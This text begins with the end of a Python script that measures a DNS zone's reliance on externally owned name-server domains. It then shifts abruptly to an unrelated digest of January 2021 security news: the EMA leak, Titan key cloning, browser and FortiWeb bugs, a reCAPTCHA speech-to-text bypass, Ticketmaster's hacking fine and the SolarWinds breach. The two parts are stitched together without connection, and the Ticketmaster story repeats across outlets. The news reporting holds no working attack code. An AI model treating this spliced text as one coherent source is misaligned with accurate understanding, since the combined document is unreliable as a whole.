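        result[zone] = {d: c / len(hosts) for d, c in counts.items()}
    return result


def external_dependencies(ns_records, operator_domains):
    """List (zone, apex domain, share) for name servers whose apex domain the
    zone's operator does not control, largest share first."""
    out = []
    for zone, shares in delegation_dependencies(ns_records).items():
        owned = operator_domains.get(zone, set())
        out.extend((zone, d, s) for d, s in shares.items() if d not in owned)
    return sorted(out, key=lambda t: (-t[2], t[0], t[1]))


# Constructed sample: the .cd layout mirrors the article (two name servers
# under scpt-network.com, two under the operator's own domain); "zz." is an
# invented zone to exercise the two-label suffix rule.
SAMPLE_NS = {
    "cd.": ["ns1.scpt-network.com.", "ns2.scpt-network.com.",
            "ns1.saix.example.", "ns2.saix.example."],
    "zz.": ["ns1.registry.co.za.", "ns2.registry.co.za.", "ns3.partner-dns.com.au."],
}
OPERATOR_DOMAINS = {"cd.": {"saix.example"}, "zz.": {"registry.co.za"}}

if __name__ == "__main__":
    for zone, domain, share in external_dependencies(SAMPLE_NS, OPERATOR_DOMAINS):
        print(f"{zone} relies on {domain} for {share:.0%} of its name servers")
```

The share is the number that matters: resolvers pick among a zone's name servers, so the fraction of NS records under a domain approximates the fraction of traffic an attacker who acquired that domain could answer. Each external domain in the output is one whose expiry date belongs on the operator's renewal calendar.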
EMA said that hackers manipulated stolen documents before leaking them
18.1.2021 Hacking Securityaffairs
The European Medicines Agency (EMA) revealed Friday that COVID-19 vaccine documents stolen from its servers have been manipulated before the leak.
The European Medicines Agency (EMA) declared that COVID-19 vaccine documents stolen from its servers in a recent cyber attack have been manipulated.
In December, a cyber attack hit the European Medicines Agency (EMA). At the time of the disclosure of the hack, the EMA did not provide technical details about the attack, nor whether it will have an impact on its operations while it is evaluating and approving COVID-19 vaccines.
The European agency plays a crucial role in the evaluation of COVID-19 vaccines across the EU; it has access to sensitive and confidential information, including quality, safety, and efficacy data resulting from trials.
Nation-state actors consider organizations involved in the research of the vaccine a strategic target to gather intelligence on the ongoing response of the government to the pandemic. At the end of November, the Reuters agency revealed in an exclusive that the COVID vaccine maker AstraZeneca was targeted by alleged North Korea-linked hackers.
After the attack, Pfizer and BioNTech issued a joint statement that confirms that some documents related to their COVID-19 submissions were accessed by the threat actors.
Last week, the European Medicines Agency (EMA) revealed that threat actors had stolen some of the Pfizer/BioNTech COVID-19 vaccine data and leaked it online.
The agency added that the European medicines regulatory network is fully functional and that the cyber attack had no impact on COVID-19 evaluation and approval timelines.
The investigation conducted by the European Medicines Agency showed that threat actors manipulated emails and documents related to the evaluation of experimental COVID-19 vaccines before leaking them online.
The manipulation of the documents is part of a disinformation campaign aimed at raising doubts about the vaccine and the work of the EMA.
“Some of the correspondence has been manipulated by the perpetrators prior to publication in a way which could undermine trust in vaccines,” the Netherlands-based agency said.
“We have seen that some of the correspondence has been published not in its integrity and original form and, or with, comments or additions by the perpetrators.”
Multiple security firms, such as Cyble and Yarix, have found leaks on underground forums.
“During the assessment of data, our researchers noticed that multiple confidential files, including MoMs, assessment reports, confidential emails, login portal links and images of its internal pages were accessed and leaked.” reported the analysis published by Cyble.
The experts shared screenshots of the internal email where the portal link was shared, the login page for the portal to access the reports, and images of internal pages.
The documents also include the alleged assessment report of COVID-19 vaccine along with the summary report of drug release and stability.
Law enforcement authorities are still investigating the security incident.
Researchers Show Google's Titan Security Keys Can Be Cloned
12.1.2021 Hacking Securityweek
Researchers have found a way to clone Google’s Titan Security Keys through a side-channel attack, but conducting an attack requires physical access to a device for several hours, as well as technical skills, custom software, and relatively expensive equipment.
Security key devices are considered highly effective when it comes to protecting accounts against takeover attempts and, unlike other types of two-factor authentication (2FA) systems, they are much more difficult to compromise. They are recommended for securing very important accounts as they make it very difficult for attackers to access the targeted user’s account even if they have phished their credentials and compromised their mobile phone, which is often used as part of the multi-factor authentication process.
Titan security key
A new attack method against such devices was described by researchers from NinjaLab, a France-based company that specializes in the security of cryptographic implementations. They conducted experiments on the Google Titan Security Key’s secure element, namely the NXP A700X chip, and Rhea, an NXP J3D081 Java Card that is freely available on the web and which uses the same cryptographic library.
The method was validated in the summer of 2020 and it was reported to Google and Dutch-American semiconductor manufacturer NXP in early October. Google has acknowledged the research, but determined that it does not qualify for a bug bounty due to the fact that the vulnerability exists in the NXP product.
According to NinjaLab, in addition to Titan devices and NXP Java Card chips, the attack also works against a Yubico Yubikey model that is no longer offered for sale — newer Yubico products do not appear to be impacted — and Feitian-branded security keys. Feitian is the company that makes Google's Titan key, but it also sells them under its own brand.
Conducting an attack involves acquiring electromagnetic (EM) radiations from the NXP chip during ECDSA (Elliptic Curve Digital Signature Algorithm) signatures, which is the core crypto operation of the FIDO U2F protocol. The attack leverages what researchers described as a side-channel vulnerability in the ECDSA signature implementation (CVE-2021-3011).
The researchers said it took 4 hours to acquire 4,000 side-channel traces of the U2F authentication request command on the Rhea device, and 6 hours to monitor 6,000 operations on the Titan, which allowed them to extract the ECDSA private key linked to an account.
The recovered private key can allow an attacker to clone the device and use it to log in to the targeted user’s account, assuming that they have also obtained the account username and password.
However, the researchers pointed out that an attack is not easy to conduct. First of all, the attacker would need to obtain the victim’s security key for several hours without raising suspicion — the victim could change the password or take other steps to secure their account if they notice that their security key is missing and they suspect that an attack on their account is imminent.
The attacker then needs to open the Titan Security Key casing without damaging the chip, perform the EM radiation analysis (which takes several hours), and create a clone of the security key. The researchers also highlighted that the equipment needed to conduct the analysis costs roughly €10,000 ($12,000), and the attacker would also need to have the technical skills to develop custom software and conduct an attack.
“Thus it is still clearly far safer to use your Google Titan Security Key (or other impacted products) as FIDO U2F two-factor authentication token to sign in to applications like your Google account rather than not using one,” the researchers explained in their paper. “Nevertheless, this work shows that the Google Titan Security Key (or other impacted products) would not avoid unnoticed security breach by attackers willing to put enough effort into it. Users that face such a threat should probably switch to other FIDO U2F hardware security keys, where no vulnerability has yet been discovered.”
Bugs in Firefox, Chrome, Edge Allow Remote System Hijacking
8.1.2021 Hacking Threatpost
Major browsers get an update to fix separate bugs that both allow for remote attacks, which could potentially allow hackers to take over targeted devices.
Makers of the Chrome, Firefox and Edge browsers are urging users to patch critical vulnerabilities that if exploited allow hackers to hijack systems running the software.
The Mozilla Firefox vulnerability (CVE-2020-16044) is separate from a bug reported in Google’s browser engine Chromium, which is used in the Google Chrome browser and Microsoft’s latest version of its Edge browser.
Critical Firefox Use-After-Free Bug
On Thursday, the Cybersecurity and Infrastructure Security Agency (CISA) urged users of Mozilla Foundation’s Firefox browser to patch a bug, tracked as CVE-2020-16044, and rated as critical. The vulnerability is classified as a use-after-free bug and tied to the way Firefox handles browser cookies and if exploited allows hackers to gain access to the computer, phone or tablet running the browser software.
Impacted is the desktop Firefox browser version 84.0.2, Firefox Android 84.1.3 edition and also Mozilla’s corporate ESR 78.6.1 version of Firefox.
“A malicious peer could have modified a COOKIE-ECHO chunk in a SCTP packet in a way that potentially resulted in a use-after-free. We presume that with enough effort it could have been exploited to run arbitrary code,” according to a Mozilla security bulletin posted Thursday.
The acronym SCTP stands for Stream Control Transmission Protocol, used in computer networking to communicate protocol data within the Transport Layer of the internet protocol suite, or TCP/IP. The bug is tied to the way cookie data is handled by SCTP.
Each inbound SCTP packet contains a cookie chunk that facilitates a corresponding reply from the browser’s cookie. A COOKIE ECHO chunk is a snippet of data sent during the initialization of the SCTP connection with the browser.
According to Mozilla, an adversary could craft a malicious COOKIE-ECHO chunk to impact the browser’s memory. “A use-after-free vulnerability relates to incorrect use of dynamic memory during program operation. If after freeing a memory location, a program does not clear the pointer to that memory, an attacker can use the error to hack the program,” according to a description of the vulnerability.
Mozilla did not credit the bug discovery, nor did it state whether it was a vulnerability actively being exploited in the wild.
Chromium Browser Bug Impacts Chrome and Edge
Also on Thursday, CISA urged Windows, macOS and Linux users of Google’s Chrome browser to patch an out-of-bounds write bug (CVE-2020-15995) impacting the current 87.0.4280.141 version of the software. The CISA warning stated that the latest version of the Chrome browser “addresses vulnerabilities that an attacker could exploit to take control of an affected system.”
Because Microsoft’s latest Edge browser is based on Google Chromium browser engine, Microsoft also urged its users to update to the latest 87.0.664.75 version of its Edge browser.
While researchers at Tenable classify the out-of-bounds bug as critical, both Google and Microsoft classified the vulnerability as high severity. Tencent Security Xuanwu Lab researcher Bohan Liu is credited for finding and reporting the bug.
Interestingly, the CVE-2020-15995 bug dates back to a Chrome for Android security bulletin Google published in October 2020. At the time, the bug was also classified as high-severity. The flaw is identified as an “out of bounds write in V8”, a bug originally found in September 2020 by Liu.
V8 is Google’s open-source and high-performance JavaScript and WebAssembly engine, according to a Google developer description. While the technical specifics of the bug are not available, similar out of bounds write in V8 bugs have allowed remote attackers to exploit a heap corruption via a crafted HTML page.
A heap corruption is a type of memory corruption that occurs in a computer program when the contents of a memory location are modified due to programmatic behavior that exceeds the intention of the original programmer or program/language constructs. A so-called heap-smashing attack can be used to exploit instances of heap corruption, according to an academic paper (PDF) co-authored by Nektarios Georgios Tsoutsos, student member of IEEE and Michail Maniatakos, senior member of IEEE.
“Heap Smashing Attacks exploit dynamic memory allocators (e.g. ,malloc) by corrupting the control structures defining the heap itself. By overflowing a heap block, attackers could overwrite adjacent heap headers that chain different heap blocks, and eventually cause the dynamic memory allocator to modify arbitrary memory locations as soon as a heap free operation is executed. The malicious payload can also be generated on-the-fly: for example, by exploiting Just-In-Time (JIT) compilation, assembled code can be written on the heap,” they wrote.
Neither Microsoft nor Google explain why the October 2020 CVE-2020-15995 is being featured again in both their Thursday security bulletins. Typically, that’s an indication that the original fix was incomplete.
More Chromium Bugs Impact Chrome and Edge
Twelve additional bugs were reported by Google, impacting its Chromium browser engine. Both Google and Microsoft featured the same list of vulnerabilities (CVE-2021-21106, CVE-2021-21107, CVE-2021-21108, CVE-2021-21109, CVE-2021-21110, CVE-2021-21111, CVE-2021-21112, CVE-2021-21113, CVE-2021-21114, CVE-2021-21115, CVE-2021-21116, CVE-2020-16043).
The majority of the bugs were rated high-severity and tied to use-after-free bugs. Three of the vulnerabilities earned bug hunters $20,000 for their efforts. Weipeng Jiang from Codesafe Team of Legendsec at Qi’anxin Group is credited for finding two of the $20,000 bugs (CVE-2021-21106 and CVE-2021-21107): the first is a use-after-free bug in Chromium’s autofill function, the second a use-after-free bug in the Chromium media component.
Leecraso and Guang Gong of 360 Alpha Lab earned $20,000 for CVE-2021-21108, also a use-after-free bug in the browser’s media component.
No technical details were disclosed, and typically they aren’t until it is determined that most Chrome browsers have been updated.
Multiple flaws in Fortinet FortiWeb WAF could expose corporate networks to hack
8.1.2021 Hacking Securityaffairs
An expert found multiple serious vulnerabilities in Fortinet’s FortiWeb web application firewall (WAF) that could expose corporate networks to hack.
Andrey Medov, a security researcher at Positive Technologies, found multiple serious vulnerabilities in Fortinet’s FortiWeb web application firewall (WAF) that could be exploited by attackers to hack into corporate networks.
The flaws, tracked as CVE-2020-29015, CVE-2020-29016, CVE-2020-29018, and CVE-2020-29019, have been already addressed by Fortinet with the release of security patches.
The vulnerabilities include a blind SQL injection, a stack-based buffer overflow issue, another buffer overflow, and a format string vulnerability that could lead to the execution of unauthorized code or commands or to denial-of-service (DoS) conditions.
The flaws reside in the FortiWeb administration interface, which means that a remote attacker could exploit them to potentially access the corporate network.
“A stack-based buffer overflow vulnerability in FortiWeb may allow an unauthenticated, remote attacker to overwrite the content of the stack and potentially execute arbitrary code by sending a crafted request with a large certname.” reads the PSIRT advisory for CVE-2020-29016.
The vendor recommends that customers upgrade to FortiWeb versions:
6.2.4 or above to address the CVE-2020-29015 flaw
6.3.6 or above to address CVE-2020-29016 and CVE-2020-29018
6.3.8 or above to address the CVE-2020-29019
Researcher Breaks reCAPTCHA With Google’s Speech-to-Text API
5.1.2021 Hacking Threatpost
Researcher uses an old unCAPTCHA trick against the latest audio version of reCAPTCHA, with a 97 percent success rate.
An old attack method dating back to 2017 that uses voice-to-text to bypass CAPTCHA protections turns out to still work on Google’s latest reCAPTCHA v3.
That’s according to researcher Nikolai Tschacher, who posted a video proof-of-concept (PoC) of the attack on Jan. 2.
CAPTCHA, introduced in 2014, is an acronym for Completely Automated Public Turing Test to Tell Computers and Humans Apart. ReCaptcha is Google’s name for its own technology and free service that uses image, audio or text challenges to verify that a human is signing into an account. It’s a bit of code available free of charge from Google for accounts that handle less than 1 million queries a month. Google recently started charging for larger reCAPTCHA accounts.
“The idea of the attack is very simple: You grab the MP3 file of the audio reCAPTCHA and you submit it to Google’s own speech-to-text API,” Tschacher wrote. “Google will return the correct answer in over 97 percent of all cases.”
The report includes a video showing how Tschacher’s bot works. He added that this attack method works on even the latest version, reCAPTCHA v3.
Google did not immediately respond to Threatpost’s request for comment on the report.
Tschacher pointed out that his bot wouldn’t be easy to exploit at scale for three specific reasons: Google rate-limits audio CAPTCHA access; Google is likely tracking bot metrics; and it creates a fingerprint of each browsing device to stop bots.
“But still, we are approaching a point in time where the Turing Test can be solved by advanced AI, thus making CAPTCHAs harder and harder to implement,” Tschacher told Threatpost. “CAPTCHAs will be replaced by passive AI that collects all kinds of data to constantly determine whether the browsing signal appears to be human or not. The decision will be based on browsing fingerprint, JavaScript user interaction events such as mouse movements and key presses, and IP-address metadata.”
CAPTCHA, ReCAPTCHA, UnCAPTCHA
The idea of using speech-to-text against CAPTCHA protections was first introduced in 2017 by researchers at the University of Maryland, who then reported they “achieved 85 percent accuracy” with the tech they dubbed “UnCAPTCHA.”
Google responded with improved browser automation detection and the use of spoken phrases instead of numbers, according to the researchers’ GitHub reports. But by June 2018 the researchers found that the latest reCAPTCHA was easier to trick than its predecessor.
“Thanks to the changes to the audio challenge, passing reCAPTCHA is easier than ever before. The code now only needs to make a single request to a free, publicly available speech to text API to achieve around 90 percent accuracy over all CAPTCHAs,” according to the GitHub findings from the University of Maryland team.
They explained that reCAPTCHA was designed to block Selenium browser automation engines, whereas “unCAPTCHA2 uses a screen clicker to move to certain pixels on the screen and move around the page like a human,” the researchers continued. “There is certainly work to be done here — the coordinates need to be updated for each new user and is not the most robust.”
The report added that the reCAPTCHA bug was reported to Google in June 2018, and they okayed the release of the unCAPTCHA2 code.
“UnCAPTCHA2, like the original version, is meant to be a PoC,” the report’s disclaimer said. “As Google updates its service, this repository will not be updated. As a result, it is not expected to work in the future, and is likely to break at any time.”
Now Tschacher appears to have come up with what could be called unCAPTCHA3, except now he said he can achieve a 97 percent success rate, instead of the original 85 percent reported in 2017.
Is CAPTCHA Secure?
“There has always been a game of cat-and-mouse between barriers like CAPTCHA and reCAPTCHA, and workarounds that attackers seeking automation employ,” Oliver Tavakoli, Vectra CTO, told Threatpost. “This is a clever approach in that it uses an alternate scheme made available for visually impaired people to de-fang reCAPTCHA – and using Google’s own speech-to-text API adds a bit of irony to the workaround. Hard to see how to supply support for the visually impaired without making reCAPTCHA a lot more easy to game.”
But according to Dirk Schrader, global vice president with New Net Technologies, there isn’t a ready alternative for the widespread replacement of CAPTCHAs, and even if there were an easy swap to be made, the reality is that no single technology can replace good cybersecurity controls.
“This research could also be titled ‘Machines tricking Machines,’” Schrader said. “It’s proof that no technology, and no application, is safe forever and the need for security of systems is based on core controls like change control and vulnerability management is reconfirmed.”
He added that CAPTCHA has been a reliable tool in separating machines from humans and might just need a bit of tweaking to keep up.
“The fact that one Google ‘machine’ is used against the other just adds the fun factor to the story,” Schrader said. “CAPTCHA has long been seen as a pain, however so far has proven to be a fairly good instrument to distinguish human from machine interaction.”
Ticketmaster Coughs Up $10 Million Fine After Hacking Rival Business
5.1.2021 Hacking Threatpost
Several Ticketmaster executives conspired in a hack against a rival concert presales firm, in an attempt to ‘choke off’ its business.
Ticketmaster must pay a hefty $10 million fine after several employees utilized unlawfully obtained passwords to hack a rival company’s computer systems – in attempts to “choke off” its business.
The American ticket sales and distribution giant, which is owned by Live Nation, in 2013 hired an employee who formerly worked for Ticketmaster’s rival company (reported by some outlets to be Songkick, a now-defunct company that offered concert pre-sale tickets), according to the Department of Justice (DoJ) last week.
This co-conspirator illegally retained credentials from the rival firm, which he and other Ticketmaster executives then used to hack into the victim company’s systems. From there, they were able to monitor the company’s draft ticketing web pages, allowing them to find out which artists planned to use the rival company to sell tickets. They were also able to hack into and snoop on the company’s Artist Toolbox, a password-protected app that provides real-time data about ticket sales.
“When employees walk out of one company and into another, it’s illegal for them to take proprietary information with them,” said FBI Assistant Director-in-Charge Sweeney in a statement. “Ticketmaster used stolen information to gain an advantage over its competition, and then promoted the employees who broke the law. This investigation is a perfect example of why these laws exist — to protect consumers from being cheated in what should be a fair market place.”
The Hack
According to court documents, the former senior employee (who as of now remains unnamed) of the victim company worked there between May 2010 and July 2012. In 2012, he signed a separation agreement with the victim company upon leaving, in which he agreed to maintain the confidentiality of that company’s sensitive data, before joining Live Nation in August 2013.
In 2013, this former employee shared with former Ticketmaster head of the Artist Services division Zeeshan Zaidi the URLs for draft ticketing web pages of the victim company, which were not public.
“In response to a Ticketmaster executive explaining that the goal was to ‘choke off [victim company]’ and ‘steal back one of [the victim company]’s signature clients,’ co-conspirator 1 offered that Ticketmaster could ‘cut [victim company] off at the knees’ if they could win back presale ticketing business for a second major artist that was a client of the victim company,” according to the DoJ.
Then, the former employee sent Zaidi and another Ticketmaster executive multiple sets of usernames and passwords for the victim company’s password-protected Artist Toolbox app, and encouraged them to “screen-grab the hell out of the system.” The co-conspirators even went so far as to use the passwords to access the app in a live demo at a Ticketmaster internal summit, in front of at least 14 other Ticketmaster and Live Nation employees, according to the DoJ.
The former employee in 2015 was promoted and given a raise; meanwhile, Ticketmaster employees continued to access the Artist Toolbox app through December 2015.
Next Steps
In 2015, the victim company filed a civil complaint against Live Nation and Ticketmaster alleging antitrust violations. That lawsuit was amended in 2017 to add allegations that Ticketmaster had accessed the company’s computer systems without authorization. In 2017, both the former employee and Zaidi were terminated by Ticketmaster.
Last week’s fine against Ticketmaster resolves charges that the company “repeatedly accessed without authorization the competitor’s computer systems.” The fine is part of a deferred prosecution agreement that Ticketmaster entered with the U.S. Attorney’s Office for the Eastern District of New York to resolve a five-count criminal complaint filed today charging computer intrusion and fraud offenses. As part of the charges, on Oct. 18, 2019, Zaidi pled guilty in a related case to conspiring to commit computer intrusions and wire fraud based on his participation in this scheme.
This is also not the first time Ticketmaster has found itself up against a hefty fine for cybersecurity-related issues. In November, Ticketmaster’s U.K. division was slapped with a $1.65 million fine by the Information Commissioner’s Office (ICO) in the UK, over its 2018 data breach that impacted 9.4 million customers.
The incident points to employee insider threats facing many companies – an issue that is particularly worrying today as many may feel stressed or disillusioned by their workplace during today’s shaky, COVID-19-disrupted economy. One specific concern for companies reflected by this particular case is illegal employee data retention after leaving a firm. For instance, last year a former Cisco employee was sentenced to two years in jail after he hacked into Cisco’s Webex collaboration platform – after leaving the firm.
Threatpost has reached out to Ticketmaster for further comment and has not heard back before publication.
Over 250 Organizations Breached via SolarWinds Supply Chain Hack: Report
5.1.2021 Hacking Securityweek
It is believed that the recently disclosed attack targeting Texas-based IT management solutions provider SolarWinds resulted in threat actors gaining access to the networks of more than 250 organizations, according to reports.
The New York Times reported over the weekend that the SolarWinds supply chain attack is believed to have impacted as many as 250 government agencies and businesses.
It was previously revealed that the list of victims included major tech companies such as Microsoft, Cisco and VMware, and U.S. government agencies such as the State Department, Commerce Department, Treasury, DHS, and the National Institutes of Health.
Microsoft admitted recently that the attackers gained access to some of its source code, but the company claimed they couldn’t have made any modifications to the code.
The New York Times also learned that some SolarWinds software is maintained in Eastern Europe and investigators in the U.S. are now trying to determine if the breach originated there.
This link to Eastern Europe has raised some concerns considering that many believe the attack was conducted by hackers connected to Russian intelligence.
In the meantime, SolarWinds continues to share updates regarding its investigation into the incident. The supply chain attack involved the use of trojanized updates for the company’s Orion monitoring product in an effort to deliver, among other things, a piece of malware named SUNBURST.
However, investigations revealed the existence of a different piece of malware, named SUPERNOVA, that may have been used by a different threat actor as part of an operation that may not be related to the supply chain attack.
SolarWinds and others are trying to determine if SUPERNOVA, whose delivery involved exploitation of a zero-day vulnerability, is connected to SUNBURST. In its latest update, the company said it does “not have a definitive answer at this time” regarding SUNBURST and SUPERNOVA possibly being related.
On December 18, shortly after the SolarWinds breach came to light, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued an emergency directive instructing federal agencies to immediately take steps to detect, investigate and respond to potential intrusions. On December 30, CISA issued supplemental guidance to help government organizations mitigate the threat.
Ticketmaster will pay $10 Million fine over hacking a competitor
3.1.2021 Hacking Securityaffairs
Ticketmaster agreed to pay a $10 million fine for hacking into the computer system of the startup rival CrowdSurge.
The news is disturbing: Ticketmaster has agreed to pay a $10 million fine after being charged with illegally accessing the computer systems of the startup rival CrowdSurge. The intrusions into the competitor’s systems took place repeatedly between 2013 and 2015.
A Ticketmaster executive explained that the goal was to “choke off [victim company]” and “steal back one of [victim company]’s signature clients.”
The attacks aimed at stealing information to gain an advantage over CrowdSurge, which was acquired by Warner Music Group (WMG) in 2017.
“Ticketmaster Used Passwords Unlawfully Retained by a Former Employee of a Competitor to Access Computer Systems in Scheme to “Choke Off” the Victim’s Business” wrote the DoJ.
According to the investigators, the company used stolen passwords to unlawfully collect business intelligence.
“Ticketmaster employees repeatedly – and illegally – accessed a competitor’s computers without authorization using stolen passwords to unlawfully collect business intelligence,” stated Acting U.S. Attorney DuCharme. “Further, Ticketmaster’s employees brazenly held a division-wide ‘summit’ at which the stolen passwords were used to access the victim company’s computers, as if that were an appropriate business tactic. Today’s resolution demonstrates that any company that obtains a competitor’s confidential information for commercial advantage, without authority or permission, should expect to be held accountable in federal court.”
In 2017, CrowdSurge sued Live Nation for antitrust violations, accusing Ticketmaster of illegally accessing confidential business documents, including client lists, contracts, and credentials for the victim’s tools.
Ticketmaster hired a former employee of CrowdSurge, Stephen Mead, to gain access to the systems of the rival company.
Mead had been CrowdSurge’s general manager of U.S. operations. He provided Zeeshan Zaidi, the former head of Ticketmaster’s artist services division, and another Ticketmaster employee with the passwords to Artist Toolbox, an app that allows the victim’s customers to view real-time data about ticket sales.
“In early May 2014, a senior executive of Live Nation (Corporate Officer-1) asked Zaidi and others how Ticketmaster’s presale online offering compared with the Toolbox. Coconspirator-1 was then asked to “do a screenshare/demo” at an upcoming “Artist Services Summit.” Coconspirator-1 agreed to “pull together a list of the log-ins and URL’s that I still have access to for this so I can give the team as much insight as possible.” At least 14 Live Nation and Ticketmaster employees attended the Artist Services Summit, in San Francisco.” continues the DoJ. “There, in front of those employees, Coconspirator-1 used a username and password he had retained from his employment at the victim company to log in to a Toolbox, and provided a demonstration. Coconspirator-1 later also provided Zaidi and other Ticketmaster executives with internal and confidential financial documents he had retained from his employment at the victim company.”
Both Mead and Zaidi were fired by Ticketmaster in 2017.
On October 18, 2019, Zaidi pled guilty for his participation in the hacking activity.
Ticketmaster already paid $110 million in 2018 to settle a civil suit brought by Songkick, which merged with CrowdSurge in 2015.
Ticketmaster will pay a criminal penalty of $10 million and will maintain a compliance and ethics program to prevent and detect violations of the Computer Fraud and Abuse Act and other applicable laws, and to prevent the unauthorized and unlawful acquisition of confidential information belonging to its competitors.
Ticketmaster will also report to the US Attorney’s Office annually over the three-year term of the agreement regarding these compliance measures.
Ticketmaster To Pay $10 Million Fine For Hacking A Rival Company
3.1.2021 Hacking Thehackernews
Ticketmaster has agreed to pay a $10 million fine after being charged with illegally accessing computer systems of a competitor repeatedly between 2013 and 2015 in an attempt to "cut [the company] off at the knees."
A subsidiary of Live Nation, the California-based ticket sales and distribution company used the stolen information to gain an advantage over CrowdSurge — which merged with Songkick in 2015 and was later acquired by Warner Music Group (WMG) in 2017 — by hiring a former employee to break into its tools and gain insight into the firm's operations.
"Ticketmaster employees repeatedly – and illegally – accessed a competitor's computers without authorization using stolen passwords to unlawfully collect business intelligence," said Acting U.S. Attorney Seth DuCharme.
"Further, Ticketmaster's employees brazenly held a division-wide 'summit' at which the stolen passwords were used to access the victim company's computers, as if that were an appropriate business tactic."
The allegations were first reported in 2017 after CrowdSurge sued Live Nation for antitrust violations, accusing Ticketmaster of accessing confidential business plans, contracts, client lists, and credentials of CrowdSurge tools.
According to court documents released on December 30, after being hired by Live Nation in 2013, Stephen Mead, who was CrowdSurge's general manager of U.S. operations, shared with Zeeshan Zaidi, the former head of Ticketmaster's artist services division, and another Ticketmaster employee the passwords to Artist Toolbox, an app that provided real-time data about tickets sold through the victim company.
Besides password theft, Mead is also accused of providing "internal and confidential financial documents" retained from his former employer, as well as URLs for draft ticketing web pages so as to learn which artists planned to use CrowdSurge to sell tickets and "dissuade" them from doing so.
On October 18, 2019, Zaidi pled guilty in a related case to conspiring to commit computer intrusions and wire fraud for his participation in the scheme, stating, "we're not supposed to tip anyone off that we have this view into [the victim company's] activities."
An unnamed Ticketmaster executive said in an internal email the goal was to "choke off" and "steal" its signature clients by winning back the presale ticketing business for a second major artist that was a client of CrowdSurge.
Both Mead and Zaidi are no longer employed by Ticketmaster.
Ticketmaster previously settled a lawsuit brought by Songkick in 2018 by agreeing to pay the company's owners $110 million and acquire its remaining intellectual property not sold to WMG for an undisclosed amount.
Besides paying the $10 million penalties, Ticketmaster is expected to maintain a compliance and ethics program to detect and prevent such unauthorized acquisition of confidential information belonging to its rivals.
The company will also be required to make an annual report to the U.S. Attorney's Office over the next three years to ensure compliance.
SolarWinds hackers gained access to Microsoft source code
1.1.2021 Hacking Securityaffairs
The threat actors behind the SolarWinds supply chain attack could have had access to the source code of several Microsoft products.
The threat actors behind the SolarWinds attack could have compromised a small number of internal accounts and used at least one of them to view source code in a number of source code repositories.
Shortly after the disclosure of the SolarWinds attack, Microsoft confirmed that it was one of the companies breached in the recent supply chain attack, but the IT giant denied that the nation-state actors compromised its software supply-chain to infect its customers.
Frank Shaw, the corporate vice president of communications at Microsoft, confirmed that the company had detected multiple malicious SolarWinds binaries in its environment.
A Microsoft internal Solorigate investigation update published today revealed that the company has found no evidence that the attack has impacted the production services or customer data.
Microsoft also added that forged SAML tokens were not used to compromise its corporate domains.
“We detected unusual activity with a small number of internal accounts and upon review, we discovered one account had been used to view source code in a number of source code repositories,” reads the post published by Microsoft. “The account did not have permissions to modify any code or engineering systems and our investigation further confirmed no changes were made. These accounts were investigated and remediated.”
The IT giant pointed out that the account compromised by the threat actors did not have the permissions to modify any source code or engineering systems.
Microsoft plans to provide additional updates if and when its experts discover new information to support the community.
“At Microsoft, we have an inner source approach – the use of open source software development best practices and an open source-like culture – to making source code viewable within Microsoft. This means we do not rely on the secrecy of source code for the security of products, and our threat models assume that attackers have knowledge of source code. So viewing source code isn’t tied to elevation of risk.” concludes Microsoft.
“As with many companies, we plan our security with an “assume breach” philosophy and layer in defense-in-depth protections and controls to stop attackers sooner when they do gain access.”
Microsoft Says 'SolarWinds' Hackers Viewed Internal Code
1.1.2021 Hacking Securityweek
Microsoft acknowledged Thursday that attackers who spearheaded a massive hack of government and private computer networks gained access to its internal "source code," a key building block for its software.
But the US tech giant said the attackers, whom top US officials have linked to a Russian-led operation, were unable to compromise or modify any of its software.
The news shows an even broader attack vector for the breach of security software made by the US company SolarWinds. It is also believed to have given the hackers access to the systems operated by the US Treasury, Energy and Homeland Security Departments and a wide array of other victims in government and the private sector.
Microsoft had previously noted "malicious SolarWinds applications" in its systems. In an update on its internal investigation, the company said the hackers got deeper into its systems than previously believed.
"We detected unusual activity with a small number of internal accounts and upon review, we discovered one account had been used to view source code in a number of source code repositories," Microsoft said on its security blog.
"The account did not have permissions to modify any code or engineering systems and our investigation further confirmed no changes were made. These accounts were investigated and remediated."
Microsoft maintained that the latest revelation "has not put at risk the security of our services or any customer data, but we want to be transparent and share what we're learning as we combat what we believe is a very sophisticated nation-state actor."
Both US Attorney General Bill Barr and Secretary of State Mike Pompeo have attributed the attack to a Russian-led effort, while President Donald Trump has declined to point the finger at Moscow.
The Cybersecurity and Infrastructure Security Agency (CISA) said US government agencies, critical infrastructure entities and private sector organizations had been exposed in the months-long cyberattack.
Microsoft Says SolarWinds Hackers Accessed Some of Its Source Code
1.1.2021 Hacking Thehackernews
Microsoft on Thursday revealed that the threat actors behind the SolarWinds supply chain attack were able to gain access to a small number of internal accounts and escalate access inside its internal network.
The "very sophisticated nation-state actor" used the unauthorized access to view, but not modify, the source code present in its repositories, the company said.
"We detected unusual activity with a small number of internal accounts and upon review, we discovered one account had been used to view source code in a number of source code repositories," the Windows maker disclosed in an update.
"The account did not have permissions to modify any code or engineering systems and our investigation further confirmed no changes were made. These accounts were investigated and remediated."
The development is the latest in the far-reaching espionage saga that came to light earlier in December following revelations by cybersecurity firm FireEye that attackers had compromised its systems via a trojanized SolarWinds update to steal its Red Team penetration testing tools.
During the course of the probe into the hack, Microsoft had previously admitted to detecting malicious SolarWinds binaries in its own environment but denied its systems were used to target others or that attackers had access to production services or customer data.
Several other companies, including Cisco, VMware, Intel, NVIDIA, and a number of other US government agencies, have since discovered markers of the Sunburst (or Solorigate) malware on their networks, planted via tainted Orion updates.
The Redmond-based company said its investigation is still ongoing but downplayed the incident, adding "viewing source code isn't tied to elevation of risk" and that it had found evidence of attempted activities that were neutralized by its protections.
In a separate analysis published by Microsoft on December 28, the company called the attack a "cross-domain compromise" that allowed the adversary to introduce malicious code into signed SolarWinds Orion Platform binaries and leverage this widespread foothold to continue operating undetected and access the target's cloud resources, culminating in the exfiltration of sensitive data.
SolarWinds' Orion software, however, wasn't the only initial infection vector, as the US Cybersecurity and Infrastructure Security Agency (CISA) said the attackers used other methods as well, which have not yet been publicly disclosed.
The agency also released supplemental guidance urging all US federal agencies that still run SolarWinds Orion software to update to the latest 2020.2.1 HF2 version.
"The National Security Agency (NSA) has examined this version and verified that it eliminates the previously identified malicious code," the agency said.